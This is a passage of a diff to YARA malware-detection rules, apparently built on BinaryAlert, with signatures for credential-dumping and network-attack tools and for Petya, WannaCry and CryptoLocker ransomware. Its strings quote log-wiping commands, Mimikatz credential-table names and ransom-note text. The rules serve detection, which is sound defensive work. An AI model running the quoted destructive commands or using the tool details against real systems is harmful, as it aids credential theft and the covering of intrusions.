[CRYPTO] Init" fullword ascii wide + $u0 = "oTraining" fullword ascii wide + $u1 = "Stop Training" fullword ascii wide + $u2 = "Play \"sound.wav\"" fullword ascii wide + $u3 = "&Start Recording" fullword ascii wide + $u4 = "7About record" fullword ascii wide condition: all of them } -rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite +rule BINARYALERT_Ransomware_Windows_Petya_Variant_3 { meta: - description = "Mimikatz credential dump tool: Author copywrite" + description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" author = "@fusionrace" - id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6" + id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/gentilkiwi/mimikatz" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24" + reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36" + hash = "71b6a493388e7d0b40c83ce903bc6b04" + logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48" score = 75 quality = 80 tags = "" - md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8" - md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b" - md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143" - md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" - md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca" - md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" strings: - $s1 = "Kiwi en C" fullword ascii wide - $s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide - $s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide - $s4 = "Build with love for POC only" fullword ascii wide - $s5 = "gentilkiwi (Benjamin DELPY)" fullword wide - $s6 = "KiwiSSP" fullword wide - $s7 = "Kiwi Security Support Provider" fullword wide - $s8 = "kiwi flavor !" fullword wide + $s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide + $s2 = "fsutil usn deletejournal /D %c:" fullword wide condition: any of them } -rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery +rule BINARYALERT_Ransomware_Windows_Petya_Variant_1 { meta: - description = "Delivers a text payload via RDP (rubber ducky)" + description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" author = "@fusionrace" - id = "8d035721-34ee-566f-8851-1c9501de2704" + id = "bf56c0e4-585c-509b-a182-a93c74be7524" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14" + reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168" + hash = "71b6a493388e7d0b40c83ce903bc6b04" + logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6" score = 75 quality = 80 tags = "" strings: - $s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide - $s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide - $s3 = "-cmdfile local.bat #will execute everything from local.bat" ascii wide - $s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide + $s1 = "Ooops, your important files are encrypted." fullword ascii wide + $s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide + $s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide + $s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide + $s5 = "have been encrypted. Perhaps you are busy looking for a way to recover your" fullword ascii wide + $s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide condition: any of them } -rule BINARYALERT_Hacktool_Windows_Mimikatz_Files +import "pe" + +rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE { meta: - description = "Mimikatz credential dump tool: Files" + description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta" + author = "Costin G. Raiu, Kaspersky Lab" + id = "6335bd03-0625-5856-891c-9a5decd7e00f" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://twitter.com/neelmehta/status/864164081116225536" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b" + score = 75 + quality = 80 + tags = "FILE" + md5_1 = "9c7c7149387a1c79679a87dd1ba755bc" + md5_2 = "ac21c8ad899727137c4b94458d7aa8d8" + + strings: + $a1 = { + 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 + 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 + 46 56 E8 + } + $a2 = { + 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 + 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 + 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 + 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 + 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 + 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 + FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 + 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 + 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 + 2B C0 2C C0 FF FE + } + + condition: + (( uint16(0)==0x5A4D)) and all of them +} +rule BINARYALERT_Ransomware_Windows_Cryptolocker +{ + meta: + description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives" author = "@fusionrace" - id = "ea4fd443-64dd-5466-8525-40c3a023e229" + id = "be205f4b-d078-5437-bacc-203c816db2fa" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/gentilkiwi/mimikatz" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15" + reference = "https://www.secureworks.com/research/cryptolocker-ransomware" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8" + hash = "012d9088558072bc3103ab5da39ddd54" + logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc" score = 75 quality = 80 tags = "" - md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" - md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" strings: - $s1 = "kiwifilter.log" fullword wide - $s2 = "kiwissp.log" fullword wide - $s3 = "mimilib.dll" fullword ascii wide + $u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide + $u1 = "bb to select the method of payment and the currency." fullword ascii wide + $u2 = "Where can I purchase a MoneyPak?" fullword ascii wide + $u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide + $u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide + $u5 = "cashU is a prepaid online" fullword ascii wide + $u6 = "Your important files \\b encryption" fullword ascii wide + $u7 = "Encryption was produced using a \\b unique\\b0 public key" fullword ascii wide + $u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide + $u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide condition: - any of them + 2 of them } -rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa +rule BINARYALERT_Hacktool_Multi_Ntlmrelayx { meta: - description = "Mimikatz credential dump tool" + description = "No description has been set in the source file - BinaryAlert" + author = "@mimeframe" + id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa" + score = 75 + quality = 80 + tags = "" + + strings: + $a1 = "Started interactive SMB client shell via TCP" wide ascii + $a2 = "Service Installed.. CONNECT!" wide ascii + $a3 = "Done dumping SAM hashes for host:" wide ascii + $a4 = "DA already added. Refusing to add another" wide ascii + $a5 = "Domain info dumped into lootdir!" wide ascii + + condition: + any of ($a*) +} +rule BINARYALERT_Hacktool_Multi_Masscan +{ + meta: + description = "masscan is a performant port scanner, it produces results similar to nmap" + author = "@mimeframe" + id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/robertdavidgraham/masscan" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f" + score = 75 + quality = 80 + tags = "" + + strings: + $a1 = "EHLO masscan" fullword wide ascii + $a2 = "User-Agent: masscan/" wide ascii + $a3 = "/etc/masscan/masscan.conf" fullword wide ascii + $b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii + $b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii + $b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii + $b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii + + condition: + all of ($a*) or any of ($b*) +} +rule BINARYALERT_Hacktool_Multi_Responder_Py +{ + meta: + description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server" author = "@fusionrace" - id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4" + id = "82699a67-8ba1-5535-9183-3c857e60134c" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/gentilkiwi/mimikatz" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18" + reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335" + logic_hash = "a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b" score = 75 quality = 80 tags = "" - SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" - SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" strings: - $s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide - $s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide - $s3 = "!SspCredentialList" ascii wide - $s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide - $s5 = "wdigest!l_LogSessList" fullword ascii wide - $s6 = "tspkg!TSGlobalCredTable" fullword ascii wide + $s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide + $s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide + $s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide + $s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide + $s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide + $s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide + $s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide condition: - all of them + any of them +} +rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm +{ + meta: + description = "intercepts ssh connections to capture credentials" + author = "@fusionrace" + id = "fa8362e2-83d3-5830-8952-502684ad66f9" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/jtesta/ssh-mitm" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9" + score = 50 + quality = 80 + tags = "" + + strings: + $a1 = "INTERCEPTED PASSWORD:" wide ascii + $a2 = "more sshbuf problems." wide ascii + + condition: + all of ($a*) } rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS { @@ -115576,6 +117567,37 @@ rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS condition: any of them } +rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned +{ + meta: + description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains" + author = "@fusionrace" + id = "4d458339-6589-5094-8c23-1ad2baee19f1" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/porterhau5/BloodHound-Owned/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd" + score = 75 + quality = 80 + tags = "" + + strings: + $s1 = "Find all owned Domain Admins" fullword ascii wide + $s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide + $s3 = "List all directly owned nodes" fullword ascii wide + $s4 = "Set owned and wave properties for a node" fullword ascii wide + $s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide + $s6 = "Show clusters of password reuse" fullword ascii wide + $s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide + $s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide + $s9 = "Created SharesPasswordWith relationship between" fullword ascii wide + $s10 = "Skipping finding spread of compromise due to" fullword ascii wide + + condition: + any of them +} rule BINARYALERT_Hacktool_Multi_Pyrasite_Py { meta: @@ -115611,190 +117633,359 @@ rule BINARYALERT_Hacktool_Multi_Pyrasite_Py condition: any of them } -rule BINARYALERT_Hacktool_Multi_Masscan +rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors { meta: - description = "masscan is a performant port scanner, it produces results similar to nmap" + description = "Mimikatz credential dump tool: Error messages" + author = "@fusionrace" + id = "94d50739-fc84-5bfe-821d-5e2851f681e3" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/gentilkiwi/mimikatz" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36" + score = 75 + quality = 80 + tags = "" + md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" + md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" + + strings: + $s1 = "[ERROR] [LSA] Symbols" fullword ascii wide + $s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide + $s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide + $s4 = "[ERROR] [CRYPTO] Init" fullword ascii wide + + condition: + all of them +} +rule BINARYALERT_Hacktool_Windows_Moyix_Creddump +{ + meta: + description = "creddump is a python tool to extract credentials and secrets from Windows registry hives." author = "@mimeframe" - id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a" + id = "46df781a-abab-5593-99f9-1a6b993904cb" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/moyix/creddump" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d" + score = 75 + quality = 80 + tags = "" + + strings: + $a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii + $a2 = "0123456789012345678901234567890123456789" wide ascii + $a3 = "NTPASSWORD" wide ascii + $a4 = "LMPASSWORD" wide ascii + $a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii + $a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii + + condition: + all of ($a*) +} +rule BINARYALERT_Hacktool_Windows_Wmi_Implant +{ + meta: + description = "A PowerShell based tool that is designed to act like a RAT" + author = "@fusionrace" + id = "cd90ef31-6e15-5518-8278-98e99e379916" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/robertdavidgraham/masscan" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17" + reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f" + logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d" score = 75 quality = 80 tags = "" strings: - $a1 = "EHLO masscan" fullword wide ascii - $a2 = "User-Agent: masscan/" wide ascii - $a3 = "/etc/masscan/masscan.conf" fullword wide ascii - $b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii - $b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii - $b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii - $b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii + $s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide + $s2 = "What command do you want to run on the remote system? >" fullword ascii wide + $s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide + $s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide + $s5 = "What is the name of the service you are targeting? >" fullword ascii wide + $s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide + $s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide + $s8 = "exit - Exit WMImplant" fullword ascii wide + $s9 = "Lateral Movement Facilitation" fullword ascii wide + $s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide + $s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide condition: - all of ($a*) or any of ($b*) + any of them } -rule BINARYALERT_Hacktool_Multi_Ntlmrelayx +rule BINARYALERT_Hacktool_Windows_Hot_Potato { meta: description = "No description has been set in the source file - BinaryAlert" author = "@mimeframe" - id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa" + id = "dee13640-b4a9-5a39-af01-338c0197c995" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15" + reference = "https://github.com/foxglovesec/Potato" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa" + logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7" score = 75 quality = 80 tags = "" strings: - $a1 = "Started interactive SMB client shell via TCP" wide ascii - $a2 = "Service Installed.. CONNECT!" wide ascii - $a3 = "Done dumping SAM hashes for host:" wide ascii - $a4 = "DA already added. Refusing to add another" wide ascii - $a5 = "Domain info dumped into lootdir!" wide ascii + $a1 = "Parsing initial NTLM auth..." wide ascii + $a2 = "Got PROPFIND for /test..." wide ascii + $a3 = "Starting NBNS spoofer..." wide ascii + $a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii + $a5 = "Usage: potato.exe -ip" wide ascii condition: any of ($a*) } -rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned +rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa { meta: - description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains" + description = "Mimikatz credential dump tool" author = "@fusionrace" - id = "4d458339-6589-5094-8c23-1ad2baee19f1" + id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/porterhau5/BloodHound-Owned/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20" + reference = "https://github.com/gentilkiwi/mimikatz" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd" + logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335" score = 75 quality = 80 tags = "" + SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" + SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" strings: - $s1 = "Find all owned Domain Admins" fullword ascii wide - $s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide - $s3 = "List all directly owned nodes" fullword ascii wide - $s4 = "Set owned and wave properties for a node" fullword ascii wide - $s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide - $s6 = "Show clusters of password reuse" fullword ascii wide - $s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide - $s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide - $s9 = "Created SharesPasswordWith relationship between" fullword ascii wide - $s10 = "Skipping finding spread of compromise due to" fullword ascii wide + $s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide + $s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide + $s3 = "!SspCredentialList" ascii wide + $s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide + $s5 = "wdigest!l_LogSessList" fullword ascii wide + $s6 = "tspkg!TSGlobalCredTable" fullword ascii wide condition: - any of them + all of them } -rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm +rule BINARYALERT_Hacktool_Windows_Mimikatz_Files { meta: - description = "intercepts ssh connections to capture credentials" + description = "Mimikatz credential dump tool: Files" author = "@fusionrace" - id = "fa8362e2-83d3-5830-8952-502684ad66f9" + id = "ea4fd443-64dd-5466-8525-40c3a023e229" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/jtesta/ssh-mitm" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12" + reference = "https://github.com/gentilkiwi/mimikatz" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9" - score = 50 + logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8" + score = 75 quality = 80 tags = "" + md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" + md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" strings: - $a1 = "INTERCEPTED PASSWORD:" wide ascii - $a2 = "more sshbuf problems." wide ascii + $s1 = "kiwifilter.log" fullword wide + $s2 = "kiwissp.log" fullword wide + $s3 = "mimilib.dll" fullword ascii wide condition: - all of ($a*) + any of them } -rule BINARYALERT_Hacktool_Multi_Responder_Py +rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE { meta: - description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server" + description = "Detection of strings in the post-exploitation modules of Cobalt Strike" + author = "@javutin, @mimeframe" + id = "76c2a5ae-bc7c-50c7-8731-94c75912574f" + date = "2017-12-14" + modified = "2017-12-14" + reference = "https://www.cobaltstrike.com/support" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8" + score = 75 + quality = 80 + tags = "FILE" + + strings: + $s1 = "\\devcenter\\aggressor\\external\\" + + condition: + filesize >10KB and filesize <1000KB and all of ($s*) +} +rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite +{ + meta: + description = "Mimikatz credential dump tool: Author copywrite" author = "@fusionrace" - id = "82699a67-8ba1-5535-9183-3c857e60134c" + id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6" date = "2017-08-11" modified = "2017-08-11" - reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17" + reference = "https://github.com/gentilkiwi/mimikatz" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = 